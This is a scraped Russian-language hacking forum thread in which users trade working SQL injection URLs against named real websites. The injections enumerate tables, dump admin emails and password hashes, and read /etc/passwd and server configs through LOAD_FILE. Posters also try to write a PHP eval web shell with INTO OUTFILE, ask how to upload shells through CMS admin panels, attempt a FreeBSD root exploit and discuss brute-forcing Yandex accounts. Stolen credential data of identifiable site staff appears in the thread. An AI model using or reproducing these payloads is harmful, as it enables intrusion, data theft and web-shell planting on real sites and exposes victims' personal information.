http://www.scottishfuturestrust.org.uk/news.asp?id=(SELECT+top+1+table_name+from+informat ion_schema.tables+where+table_name+not+in+('SEL'))--

:D 'SEL' это не название таблицы. а ошибка в синтаксисе

помогите раскрутить доконца плз = \
_http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+table_name+from+information_schema.tables+li mit+222,1),floor(rand(0)*2))+from+information_sche ma.tables+group+by+2)a)--+.html
Вот допустим с этой таблицы нужно узнать колонки и что в них = \
подскажи как дальше капать?

http://sng.by/articles/439%27+and+(select+1+from+(select+count(0),concat( (select+column_name+from+information_schema.column s+where+table_name=0x6962665F61646D696E5F6C6F6773+ limit+6,1),floor(rand(0)*2))+from+information_sche ma.columns%20+group+by+2)a)--+.html

:D 'SEL' это не название таблицы. а ошибка в синтаксисе

+, почти в точку) Ограничение длины GET-запроса, и всё, элементарно

+, почти в точку) Ограничение длины GET-запроса, и всё, элементарно
это не ограничение, а значение переменной обрезается

это не ограничение, а значение переменной обрезается

тоже самое другими словами ^_^

Но таки с возвращением, грозный Спудер

http://sng.by/articles/439%27+and+(select+1+from+(select+count(0),concat( (select+column_name+from+information_schema.column s+where+table_name=0x6962665F61646D696E5F6C6F6773+ limit+6,1),floor(rand(0)*2))+from+information_sche ma.columns%20+group+by+2)a)--+.html

немогу понять = \
подставляю вместо
0x6962665F61646D696E5F6C6F6773
вот это
0x57365727300 а т.е. таблица users(она есть) но ничего не показывает (всмысле колонки) тупо сайт открывается = \
что не так делаю? = \

2GroM88, users = 0x7573657273

немогу понять = \
подставляю вместо
0x6962665F61646D696E5F6C6F6773
вот это
0x57365727300 а т.е. таблица users(она есть) но ничего не показывает (всмысле колонки) тупо сайт открывается = \
что не так делаю? = \
http://www.string-functions.com/string-hex.aspx

вывожу таблицы. версия мускула 5я.
при выводе таблиц окончание съедается. допустим.

user_1, user_2, use

как можно вывести все?
пользуюсь так group_concat(table_name)

Значит так, хотел порутать фряху выбрал (http://www.exploit-db.com/exploits/10255).
SH файл исполнять не хотел, решил вручную.
Делал все по порядку, ошибки были те же, что и на странице с плоентом, НО
когда запустил ./env выелетло:
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; aborting

"/libexec/ld-elf.so.1: environment corrupt; missing value for" - такая же ошибка вылетает и у автора плоента, но вот по след. ошибке видно, что все сбрассывается.

Можете объяснить почему, пожалуйста?

_http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+column_name+from+information_schema.columns+ where+table_name=0x7573657273+limit+2,1),floor(ran d(0)*2))+from+information_schema.columns+group+by+ 2)a)--+.html

Подскажите как теперь составить запрос что бы выводить данные из колонок?
пжлст = \

http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+КОЛОНКА+from+users+limit+0,1),floor(r an d(0)*2))+from+information_schema.tables+group+by+ 2)a)--+.html

http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((s elect+КОЛОНКА+from+users+limit+0,1),floor(r an d(0)*2))+from+information_schema.tables+group+by+ 2)a)--+.html

что-то не то выдает совсем = \
Table 'sngby_sngby.users' doesn't exist

либо таблицы users не существует, либо в ней нет выборки

либо таблицы users не существует, либо в ней нет выборки
да не) вроде сущевствует)
и вней есть такие колонки как login, Ppassword
хм...

ой, совсем забыл, что колонки вытаскивали из нее. значит выборки нет, такое бывает

limit меняй, если в этом случае не выдаст тогда у тя нет прав на эту табличку
либо данных нету но это вряд ли всетаки users жееее

Итак есть иньекция в 5 версии мускула
http://www.wesm.ph/page.php?p=-7+union+select+CONCAT(0x3a,TABLE_NAME,0x3a) FROM INFORMATION_SCHEMA.TABLES
имена таблиц выводит, используем limit тоесть
http://www.wesm.ph/page.php?p=-7+union+select+CONCAT(0x3a,TABLE_NAME,0x3a) FROM INFORMATION_SCHEMA.TABLES+limit+1,1 итд
Дальше хочется узнать в каких таблицах какие колонки вот список всех таблиц

CHARACTER_SETS - 0
COLLATIONS - 1
COLLATION_CHARACTER_SET_APPLICABILITY - 2
COLUMNS - 3
COLUMN_PRIVILEGES - 4
KEY_COLUMN_USAGE - 5
PROFILING - 6
ROUTINES - 7
SCHEMATA - 8
SCHEMA_PRIVILEGES - 9
STATISTICS - 10
TABLES - 11
TABLE_CONSTRAINTS - 12
TABLE_PRIVILEGES - 13
TRIGGERS - 14
USER_PRIVILEGES - 15
VIEWS - 16
phpdig_clicks - 17
phpdig_engine - 18
phpdig_excludes - 19
phpdig_includes - 20
phpdig_keywords - 21
phpdig_logs - 22
phpdig_site_page - 23
phpdig_sites - 24
phpdig_spider - 25
phpdig_tempspider - 26
tbl_administered_price_workflow - 27
tbl_ex_ante_ex_post_workflow - 28
tbl_marginal_plants_workflow - 29
tbl_mrr_workflow - 30
tbl_projection - 31
tbl_rtd_e_workflow - 32
tbl_rtd_o_workflow - 33
tbl_rtx_e_workflow - 34
tbl_rtx_o_workflow - 35
tbl_vsaa_rtd_e_workflow - 36
tbl_vsaa_rtd_o_workflow - 37
tbl_wap_e_workflow - 38
tbl_wap_o_workflow - 39
tbladmin_links - 40
tbladmin_userlevel_links - 41
tbladmin_userlevels - 42
tbladmin_users - 43
tblannouncement - 44
tblannouncement_logs - 45
tblapproval - 46
tblcalendar_categories - 47
tblcalendar_events - 48
tblcategory - 49
tblcomments - 50
tblconfig - 51
tblcountry - 52
tbldailymarketupdate - 53
tbldailymarketupdate_download - 54
tbldata_graph - 55
tbldepartment - 56
tbldepartment_admin_users - 57
tbldepartment_bak - 58
tbldept_pages - 59
tbldocument - 60
tbldocument_download - 61
tbldocument_logs - 62
tbldownloads - 63
tbldownloads_logs - 64
tbleventcat - 65
tbleventcodes - 66
tblevents - 67
tbleventspeakers - 68
tblgovcalendar_categories - 69
tblgovcalendar_meetings - 70
tblgraph_html - 71
tblimghead - 72
tbllayouts - 73
tbllogs - 74
tblmag_dmi - 75
tblmag_dmi_logs - 76
tblmag_mmi - 77
tblmag_mmi_logs - 78
tblmag_wmi - 79
tblmag_wmi_logs - 80
tblmarket_monitoring_and_assessment - 81
tblmarketindex - 82
tblmarketindex_logs - 83
tblmaster_topics - 84
tblmaster_workflow - 85
tblmembership - 86
tblmessage - 87
tblmessage_copy - 88
tblmonthlysummary_report - 89
tblmustrununit_reports - 90
tblnews - 91
tblnews_logs - 92
tblnewsletter - 93
tblp_wk_opd - 94
tblp_wk_opd_logs - 95
tblpages - 96
tblparticipant - 97
tblpostdispatch_report - 98
tblprevweekreport_luzon - 99
tblprivileges - 100
tblrandom_page_side_messages - 101
tblref_workflow - 102
tblsub_workflow - 103
tblsubscribers - 104
tblsubscribers_topics - 105
tbltype_privilege - 106
tbluser_type - 107
tbluser_type_admin_users - 108
columns_priv - 109
db - 110
func - 111
help_category - 112
help_keyword - 113
help_relation - 114
help_topic - 115
host - 116
proc - 117
procs_priv - 118
tables_priv - 119
time_zone - 120
time_zone_leap_second - 121
time_zone_name - 122
time_zone_transition - 123
time_zone_transition_type - 124
user - 125
wesm_forum_acl_groups - 126
wesm_forum_acl_options - 127
wesm_forum_acl_roles - 128
wesm_forum_acl_roles_data - 129
wesm_forum_acl_users - 130
wesm_forum_attachments - 131
wesm_forum_banlist - 132
wesm_forum_bbcodes - 133
wesm_forum_bookmarks - 134
wesm_forum_bots - 135
wesm_forum_config - 136
wesm_forum_confirm - 137
wesm_forum_disallow - 138
wesm_forum_drafts - 139
wesm_forum_extension_groups - 140
wesm_forum_extensions - 141
wesm_forum_forums - 142
wesm_forum_forums_access - 143
wesm_forum_forums_track - 144
wesm_forum_forums_watch - 145
wesm_forum_groups - 146
wesm_forum_icons - 147
wesm_forum_lang - 148
wesm_forum_log - 149
wesm_forum_moderator_cache - 150
wesm_forum_modules - 151
wesm_forum_poll_options - 152
wesm_forum_poll_votes - 153
wesm_forum_posts - 154
wesm_forum_privmsgs - 155
wesm_forum_privmsgs_folder - 156
wesm_forum_privmsgs_rules - 157
wesm_forum_privmsgs_to - 158
wesm_forum_profile_fields - 159
wesm_forum_profile_fields_data - 160
wesm_forum_profile_fields_lang - 161
wesm_forum_profile_lang - 162
wesm_forum_ranks - 163
wesm_forum_reports - 164
wesm_forum_reports_reasons - 165
wesm_forum_search_results - 166
wesm_forum_search_wordlist - 167
wesm_forum_search_wordmatch - 168
wesm_forum_sessions - 169
wesm_forum_sessions_keys - 170
wesm_forum_sitelist - 171
wesm_forum_smilies - 172
wesm_forum_styles - 173
wesm_forum_styles_imageset - 174
wesm_forum_styles_imageset_data - 175
wesm_forum_styles_template - 176
wesm_forum_styles_template_data - 177
wesm_forum_styles_theme - 178
wesm_forum_topics - 179
wesm_forum_topics_posted - 180
wesm_forum_topics_track - 181
wesm_forum_topics_watch - 182
wesm_forum_user_group - 183
wesm_forum_users - 184
wesm_forum_warnings - 185
wesm_forum_words - 186
wesm_forum_zebra - 187
Я использовал вот такой запрос
http://www.wesm.ph/page.php?p=-7+union+select+COLUMN_NAME%20FROM%20INFORMATION_SC HEMA.COLUMNS+WHERE+TABLE_NAME=char%2839,116,98,108 ,97,100,109,105,110,95,117,115,101,114,115,39%29
Но он не прокатил, вапрос как мне вывести все столбцы таблицы,
и вот еще иногда limit не проходит, какая есть ему альтернатива ???
Заранее спсб

Итак есть иньекция в 5 версии мускула
http://www.wesm.ph/page.php?p=-7+union+select+CONCAT(0x3a,TABLE_NAME,0x3a) FROM INFORMATION_SCHEMA.TABLES
имена таблиц выводит, используем limit тоесть
http://www.wesm.ph/page.php?p=-7+union+select+CONCAT(0x3a,TABLE_NAME,0x3a) FROM INFORMATION_SCHEMA.TABLES+limit+1,1 итд
Дальше хочется узнать в каких таблицах какие колонки вот список всех таблиц

CHARACTER_SETS - 0
COLLATIONS - 1
COLLATION_CHARACTER_SET_APPLICABILITY - 2
COLUMNS - 3
COLUMN_PRIVILEGES - 4
KEY_COLUMN_USAGE - 5
PROFILING - 6
ROUTINES - 7
SCHEMATA - 8
SCHEMA_PRIVILEGES - 9
STATISTICS - 10
TABLES - 11
TABLE_CONSTRAINTS - 12
TABLE_PRIVILEGES - 13
TRIGGERS - 14
USER_PRIVILEGES - 15
VIEWS - 16
phpdig_clicks - 17
phpdig_engine - 18
phpdig_excludes - 19
phpdig_includes - 20
phpdig_keywords - 21
phpdig_logs - 22
phpdig_site_page - 23
phpdig_sites - 24
phpdig_spider - 25
phpdig_tempspider - 26
tbl_administered_price_workflow - 27
tbl_ex_ante_ex_post_workflow - 28
tbl_marginal_plants_workflow - 29
tbl_mrr_workflow - 30
tbl_projection - 31
tbl_rtd_e_workflow - 32
tbl_rtd_o_workflow - 33
tbl_rtx_e_workflow - 34
tbl_rtx_o_workflow - 35
tbl_vsaa_rtd_e_workflow - 36
tbl_vsaa_rtd_o_workflow - 37
tbl_wap_e_workflow - 38
tbl_wap_o_workflow - 39
tbladmin_links - 40
tbladmin_userlevel_links - 41
tbladmin_userlevels - 42
tbladmin_users - 43
tblannouncement - 44
tblannouncement_logs - 45
tblapproval - 46
tblcalendar_categories - 47
tblcalendar_events - 48
tblcategory - 49
tblcomments - 50
tblconfig - 51
tblcountry - 52
tbldailymarketupdate - 53
tbldailymarketupdate_download - 54
tbldata_graph - 55
tbldepartment - 56
tbldepartment_admin_users - 57
tbldepartment_bak - 58
tbldept_pages - 59
tbldocument - 60
tbldocument_download - 61
tbldocument_logs - 62
tbldownloads - 63
tbldownloads_logs - 64
tbleventcat - 65
tbleventcodes - 66
tblevents - 67
tbleventspeakers - 68
tblgovcalendar_categories - 69
tblgovcalendar_meetings - 70
tblgraph_html - 71
tblimghead - 72
tbllayouts - 73
tbllogs - 74
tblmag_dmi - 75
tblmag_dmi_logs - 76
tblmag_mmi - 77
tblmag_mmi_logs - 78
tblmag_wmi - 79
tblmag_wmi_logs - 80
tblmarket_monitoring_and_assessment - 81
tblmarketindex - 82
tblmarketindex_logs - 83
tblmaster_topics - 84
tblmaster_workflow - 85
tblmembership - 86
tblmessage - 87
tblmessage_copy - 88
tblmonthlysummary_report - 89
tblmustrununit_reports - 90
tblnews - 91
tblnews_logs - 92
tblnewsletter - 93
tblp_wk_opd - 94
tblp_wk_opd_logs - 95
tblpages - 96
tblparticipant - 97
tblpostdispatch_report - 98
tblprevweekreport_luzon - 99
tblprivileges - 100
tblrandom_page_side_messages - 101
tblref_workflow - 102
tblsub_workflow - 103
tblsubscribers - 104
tblsubscribers_topics - 105
tbltype_privilege - 106
tbluser_type - 107
tbluser_type_admin_users - 108
columns_priv - 109
db - 110
func - 111
help_category - 112
help_keyword - 113
help_relation - 114
help_topic - 115
host - 116
proc - 117
procs_priv - 118
tables_priv - 119
time_zone - 120
time_zone_leap_second - 121
time_zone_name - 122
time_zone_transition - 123
time_zone_transition_type - 124
user - 125
wesm_forum_acl_groups - 126
wesm_forum_acl_options - 127
wesm_forum_acl_roles - 128
wesm_forum_acl_roles_data - 129
wesm_forum_acl_users - 130
wesm_forum_attachments - 131
wesm_forum_banlist - 132
wesm_forum_bbcodes - 133
wesm_forum_bookmarks - 134
wesm_forum_bots - 135
wesm_forum_config - 136
wesm_forum_confirm - 137
wesm_forum_disallow - 138
wesm_forum_drafts - 139
wesm_forum_extension_groups - 140
wesm_forum_extensions - 141
wesm_forum_forums - 142
wesm_forum_forums_access - 143
wesm_forum_forums_track - 144
wesm_forum_forums_watch - 145
wesm_forum_groups - 146
wesm_forum_icons - 147
wesm_forum_lang - 148
wesm_forum_log - 149
wesm_forum_moderator_cache - 150
wesm_forum_modules - 151
wesm_forum_poll_options - 152
wesm_forum_poll_votes - 153
wesm_forum_posts - 154
wesm_forum_privmsgs - 155
wesm_forum_privmsgs_folder - 156
wesm_forum_privmsgs_rules - 157
wesm_forum_privmsgs_to - 158
wesm_forum_profile_fields - 159
wesm_forum_profile_fields_data - 160
wesm_forum_profile_fields_lang - 161
wesm_forum_profile_lang - 162
wesm_forum_ranks - 163
wesm_forum_reports - 164
wesm_forum_reports_reasons - 165
wesm_forum_search_results - 166
wesm_forum_search_wordlist - 167
wesm_forum_search_wordmatch - 168
wesm_forum_sessions - 169
wesm_forum_sessions_keys - 170
wesm_forum_sitelist - 171
wesm_forum_smilies - 172
wesm_forum_styles - 173
wesm_forum_styles_imageset - 174
wesm_forum_styles_imageset_data - 175
wesm_forum_styles_template - 176
wesm_forum_styles_template_data - 177
wesm_forum_styles_theme - 178
wesm_forum_topics - 179
wesm_forum_topics_posted - 180
wesm_forum_topics_track - 181
wesm_forum_topics_watch - 182
wesm_forum_user_group - 183
wesm_forum_users - 184
wesm_forum_warnings - 185
wesm_forum_words - 186
wesm_forum_zebra - 187
Я использовал вот такой запрос
http://www.wesm.ph/page.php?p=-7+union+select+COLUMN_NAME%20FROM%20INFORMATION_SC HEMA.COLUMNS+WHERE+TABLE_NAME=char%2839,116,98,108 ,97,100,109,105,110,95,117,115,101,114,115,39%29
Но он не прокатил, вапрос как мне вывести все столбцы таблицы,
и вот еще иногда limit не проходит, какая есть ему альтернатива ???
Заранее спсб

concat_ws(0x3a,table_schema,table_name,column_name )+from+information_schema.columns+limit+x,1

concat_ws(0x3a,table_schema,table_name,column_name )+from+information_schema.columns+limit+x,1
это как я понял имя таблицы + имя колонки, а есть ли какойнить другой спосб
+ с меня
ЗЫ
http://www.wesm.ph/page.php?p=-7+union+select+CONCAT%280x3a,username,0x3a,passwor d,0x3a%29+FROM+phpdig_sites/*
выводит ошибку, а иногда вместо пароля каркозябры, мыло и юзернейм отображаюццо, как сделать чтобы пасс отображался норм
вот пример
http://www.wesm.ph/page.php?p=-7+union+select+CONCAT%280x3a,username,0x3a,psword, 0x3a,email,0x3a%29+FROM+tbladmin_users+limit+4,4/*

и вот еще иногда limit не проходит, какая есть ему альтернатива ???
Делаешь запрос -1+union+select+group_concat(table_name)+from+infor mation_schema.tables+where+table_schema!='informat ion_schema' потом смотришь какая таблица последняя и делаешь запрос -1+union+select+group_concat(table_name)+from+infor mation_schema.tables+where+table_schema!='informat ion_schema'+and+table_name>'здесь имя последней таблицы, которая вывелась в первом запросе' и так постепенно выводишь все таблицы, тоже самое с колонками

2B0o0M
тут как бэ классическая скуля
http://www.wesm.ph/page.php?p=-7+union+select+concat_ws(0x3a,psword,email,lastlog in)+from+tbladmin_users--+
cmangosing@wesm.phЯЭТЯ@=N¤
н+ дальше лимитом но пароли думаю зашифрованы, по моему тут не поможет и convert() , unhex(hex()), AES_DECRYPT(AES_ENCRYPT()) ..... мое имхо.

psword:email:fname:lname:lastlogin:
����@=N�
�+:acmangosing@wesm.ph:Amador:Mangosing:2 010-05-12 19:44:44:
�C0lH�2:amarana@wesm.ph:Antonio:Arana:2010-05-12 05:38:12:
pu=:analmaden@wesm.ph:Arnel:Almaden:2009-06-29 16:12:24:
E[�{L:apatal@wesm.ph:Arvin:Atal:2010-04-27 19:46:56:
pu=:e@e.com:Approver:Bsd:2008-07-08 14:13:37:
pu=:e@e.com:Approver:Imd:2008-07-08 14:13:47:
MW8b:e@e.com:Approver:Opd:2009-07-09 16:44:09:

/etc/passwd = 0x2f6574632f706173737764
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
wesm:x:502:100:wesm:/home/wesm:/bin/bash
slingshot:x:501:100::/home/slingshot:/bin/bash
badz:x:0:0::/home/badz:/bin/bash
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/html/usage:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
desktop:x:80:80:desktop:/var/lib/menu/kde:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
pvm:x:24:24::/usr/share/pvm3:/bin/bash
aylanan:x:505:100::/var/www/html/files:/bin/bash
rapanosan:x:506:100::/var/www/html/files:/bin/bash
mag:x:6700:100::/var/www/html/scripts/cron/done:/bin/bash
wesm_opr:x:6701:2501::/var/www/html/cop.DwnLds/opd_temp:/bin/bash
edbrinas:x:500:48::/home/edbrinas:/bin/bash
users:x:100:48::/home/users:/bin/sh
opd:x:6702:6702:Operations Planning Department:/var/www/html/pricetrigger:/bin/bash

найденные конфиги
/etc/httpd/conf/httpd.conf путь до апача
http://www.wesm.ph/page.php?p=7+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT( CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2F65 74632F68747470642F636F6E662F68747470642E636F6E66), 0x7873716C696E6A656E64),0x71),0x71)+LIMIT+1,1/*

/etc/php.ini php.ini
/etc/my.cnf

P.S Дальше думаю не трудно )

ребят есть скул на сайте и есть форум phpbb,но форум на другой базе...
как можно узнать имя базы если mysql четвертая ветка?

нигде, только брут

Если phpbb 2ая ветка,то там в каких-то версиях можно было в раскрытии путей узнать название базы или что-то в этом духе.

уже узнали спасибо

Значит есть один уязвимый веб ресурс 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)' . нашёл значит уязвимый скрипт ,вывел версию :admin/complaintHandler.asp?id=1+or+1=@@version
Имя Базы Данных текущего юзера: admin/complaintHandler.asp?id=1%20or%201=(select%20db_na me())
Имя юзера владельца данной базой: admin/complaintHandler.asp?id=1%20or%201=(select%20syste m_user)-- = 'sa'

Вроде всё окей и всё выводится , но вот когда создаю запрос :
admin/complaintHandler.asp?id=1%20or%201=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- то в ответ получаю Record not found: 1 or 1=1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--

Зато когда создаю запрос : admin/complaintHandler.asp?id=1+or+1=(SELECT+TOP+1+colum n_NAME+FROM+INFORMATION_SCHEMA.columnS)-- колонки выводятся на ура !

Кто знает почему table_name не выводятся а с column_name всё впорядке ??

может это лишнее?
admin/complaintHandler.asp?id=1%20or%201=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

может это лишнее?
admin/complaintHandler.asp?id=1%20or%201=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--


При запросе: admin/complaintHandler.asp?id=1 (SELECT+%20TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEM A.TABLES)-- получаю Microsoft OLE DB Provider for SQL Server error '80040e14'

sp_cursoropen/sp_cursorprepare: The statement parameter can only be a single select or a single stored procedure.

на этот раз ты убрал слишком много.
я имел ввиду так admin/complaintHandler.asp?id=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

на этот раз ты убрал слишком много.
я имел ввиду так admin/complaintHandler.asp?id=1+or+1=(SELECT+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--


Record not found: 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--


:(((

Record not found: 1 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--


=convert(int,(SELECT TOP 1 cast(name as nvarchar(4000))%2bchar(126) FROM (database)..sysobjects WHERE xtype=char(85)))--

Народ, есть ли у кого база фамилий в женском склонении для брута? (Девичья фамилия матери)
Возможно ли побрутить яндекс этими фамилиями?

Есть админка XOOPS cms. как залить шелл?
На форуме ничего путевого не нашел.

парочка общих вопросов накопилась :)

1. по mysql:
1a.

+or(1,1)=select+count(0),concat((select+version()+ from+information_schema.tables+limit+0,1),floor(ra nd(0)*2))from(information_schema.tables)group+by+2 )

как выделенная конструкция называется и где о ней можно почитать в доке по mysql ?

1b. SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)d) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)e) b)a
как выделенные конструкции называются и где об этом можно почитать в доке по mysql ?

2. если есть код вида

$GetParam= $_GET["Param"];
$query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'";
$result = mysql_query($query)

и magic_quotes_gpc = On
то в общем случае сделать ничего нельзя ? [известные мне исключения - "двойной" запрос от Scipio и использование мультибайтовых кодировок (есть в блоге у Raz0r)] еще какие нить варианты есть ?

1. как обойти авторизацию на папку?
Например тут: http://cmj.com/admin

2. Как найти полный путь к корню сайта на сервере?

1. как обойти авторизацию на папку?
Например тут: http://cmj.com/admin

2. Как найти полный путь к корню сайта на сервере?

1) Никак
2) Найти ошибку с раскрытием пути.

http://prod1.cmj.com/articles/display_article.php?id=179548196+order+by+1--

Вот скуля раскручивай может чего нарулишь там.

Угар)) там даже раскручивать не надо ))
http://prod1.cmj.com/admin/
Вход в админку без авторизации))

DrakonHaSh
https://forum.antichat.ru/thread119047.html

и П.С https://forum.antichat.ru/thread104591.html

']DrakonHaSh
https://forum.antichat.ru/thread119047.html

и П.С https://forum.antichat.ru/thread104591.html
пользоваться и применять я это умею :) вникни, пожалуйста, в то, что я спрашиваю:

1. по mysql:
1a.

+or(1,1)=select+count(0),concat((select+version()+ from+information_schema.tables+limit+0,1),floor(ra nd(0)*2))from(information_schema.tables)group+by+2 )

как выделенная конструкция называется и где о ней можно почитать в доке по mysql ?

1b. SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)d) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)e) b)a
как выделенные конструкции называются и где об этом можно почитать в доке по mysql ?

2. если есть код вида

$GetParam= $_GET["Param"];
$query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'";
$result = mysql_query($query)

и magic_quotes_gpc = On
то в общем случае сделать ничего нельзя ? [известные мне исключения - "двойной" запрос от Scipio и использование мультибайтовых кодировок (есть в блоге у Raz0r)] еще какие нить варианты есть ?

ребят кто нибудь из вас имел дело с админским панелем Advanced Poll 2.08 ?
и можно ли залить шелл через этот панель?

не могу записать минишел, нужна ваша помощь:
http://www.bzpower.com/story.php?ID=-4046+union+select+1,2,3,4,5,'<?php eval($_GET[‘e’]) ?>',7,8,9,10,11,12,13,14+INTO+OUTFILE+'/home/bzpower/public_html/story.php'--

не могу записать минишел, нужна ваша помощь:
http://www.bzpower.com/story.php?ID=-4046+union+select+1,2,3,4,5,'<?php eval($_GET[‘e’]) ?>',7,8,9,10,11,12,13,14+INTO+OUTFILE+'/home/bzpower/public_html/story.php'--

http://www.bzpower.com/story.php?ID=-4046+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +from+mysql.user--+

//лей через форум


всмысле заюзать эксплоит под IP.Board?

или если я не понял, продемонстрируй плыз=)


http://www.bzpower.com/story.php?ID=-4046+union+select+1,2,3,4,5,6,concat_ws(0x3a,conve rge_id,converge_pass_hash,converge_pass_salt),8,9, 10,11,12,13,14+from+ibf_members_converge--+

расшифровываешь хеш админа, заливаешь шелл через админку форума

:.']http://www.bzpower.com/story.php?ID=-4046+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +from+mysql.user--+

//лей через форум


всмысле заюзать эксплоит под IP.Board?

или если я не понял, продемонстрируй плыз=)

через sql вы никак не зальете т.к:
1) нет прав
2) magic_quotes_gpc=on

пользоваться и применять я это умею :) вникни, пожалуйста, в то, что я спрашиваю:

1. по mysql:
1a.

+or(1,1)=select+count(0),concat((select+version()+ from+information_schema.tables+limit+0,1),floor(ra nd(0)*2))from(information_schema.tables)group+by+2 )

как выделенная конструкция называется и где о ней можно почитать в доке по mysql ?

1b. SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)d) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)e) b)a
как выделенные конструкции называются и где об этом можно почитать в доке по mysql ?

2. если есть код вида

$GetParam= $_GET["Param"];
$query = "SELECT * FROM TableName WHERE ColunmName ='".$GetParam."'";
$result = mysql_query($query)

и magic_quotes_gpc = On
то в общем случае сделать ничего нельзя ? [известные мне исключения - "двойной" запрос от Scipio и использование мультибайтовых кодировок (есть в блоге у Raz0r)] еще какие нить варианты есть ?

1 http://dev.mysql.com/doc/refman/5.1/en/row-subqueries.html
2 http://dev.mysql.com/doc/refman/5.0/en/select.html (все что после (A select_expr can be given an alias)
3 нет

нашел инъекцию...пока сам сайт показывать не буду, может быть и так будет понятно, что я хочу=)

подобрал колво столбцов
site.com/forum.php?id=65+union+select+1,2,3,4,5--
пока все нормально, НО, как только я делаю так:
site.com/forum.php?id=-65+union+select+1,2,3,4,5--

или пытаюсь узнать версию


site.com/forum.php?id=-65+union+select+version(),2,3,4,5--

то старница обнрвляется и на пару секунд выводится информация, которая мне нужна, то есть принтабельный столбец и версия, а потом через несколько секунд страница сама делает редирект на site.com/login.php

но этих пары секунд не достаточно, чтобы например разглядеть все названия столбцов и т.д.

как сделать так, чтобы страница сама не обновлялась?

нажми паузу

В Google Chrome
view-source:http://site.com/forum.php?id=-65+union+select+version(),2,3,4,5--

В других браузерах:
в настройках отключить автоматическое перенаправление

Пипл, подскажите скрипт (одним файлом) аналог phpmyadmin. А то весь его заливать на сервер через шел очень долго!

И кто подскажет как юзать это http://www.exploit-db.com/list.php?description=SunOS+5.1

GOGA075

XMM...Зачем Тебе phpmyadmin? ты прямо из шелла можешь коннектится к mysql

Konqi
Нет функции изминения!

Konqi
Нет функции изминения!

rst mysql (http://www.sendspace.com/file/85r5f2)

Пипл, подскажите скрипт (одним файлом) аналог phpmyadmin. А то весь его заливать на сервер через шел очень долго!

